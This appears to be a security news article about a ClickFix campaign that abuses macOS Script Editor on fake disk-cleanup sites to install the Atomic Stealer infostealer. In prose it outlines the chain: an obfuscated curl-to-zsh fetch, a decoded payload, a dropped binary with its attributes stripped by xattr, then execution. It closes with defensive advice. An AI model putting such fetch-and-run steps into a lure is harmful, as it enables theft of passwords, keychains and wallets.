**Script Editor**, a trusted macOS application used for writing and running scripts (primarily AppleScript and JXA), is being abused to deliver malware. Researchers have observed a new ClickFix technique that doesn't require users to manually interact with the Terminal, unlike earlier attacks. ### ClickFix Attack Bypasses Terminal Warnings While **Apple** added protections against ClickFix attacks in macOS Tahoe 26.4, which displays a warning when executing commands in the Terminal, this new Script Editor-based attack circumvents that security measure. ### Fake Apple-Themed Sites Distribute Malware Security researchers at **Jamf** have observed a campaign where attackers are using fake Apple-themed websites that pose as guides to help users reclaim disk space on their Mac computers. These sites contain seemingly legitimate system cleanup instructions but use the `applescript://` URL scheme to launch Script Editor with pre-filled executable code.  *Source: Jamf* ### Technical Breakdown of the Attack The malicious code executes an obfuscated `curl | zsh` command, which downloads and executes a script directly in system memory. This script decodes a base64 + gzip payload, downloads a binary (`/tmp/helper`), removes security attributes using `xattr -c`, makes it executable, and then runs it. ### Atomic Stealer (AMOS) Payload The final payload is a Mach-O binary identified as **Atomic Stealer** (AMOS), a commodity malware-as-a-service. This malware has been extensively deployed in ClickFix campaigns using various lures over the past year. AMOS targets a broad spectrum of sensitive data, including: * Keychain information * Desktop files * Cryptocurrency wallet extensions * Browser autofill data * Passwords * Cookies * Stored credit cards * System information Last year, AMOS also added a backdoor component to provide operators with persistent access to compromised systems. ### Mitigation and Prevention Mac users should treat Script Editor prompts with extreme caution and avoid running them unless they fully understand the code and trust the source. Rely on official documentation from Apple for macOS troubleshooting guides. While **Apple Support Communities** can be helpful, exercise caution as advice may not be risk-free.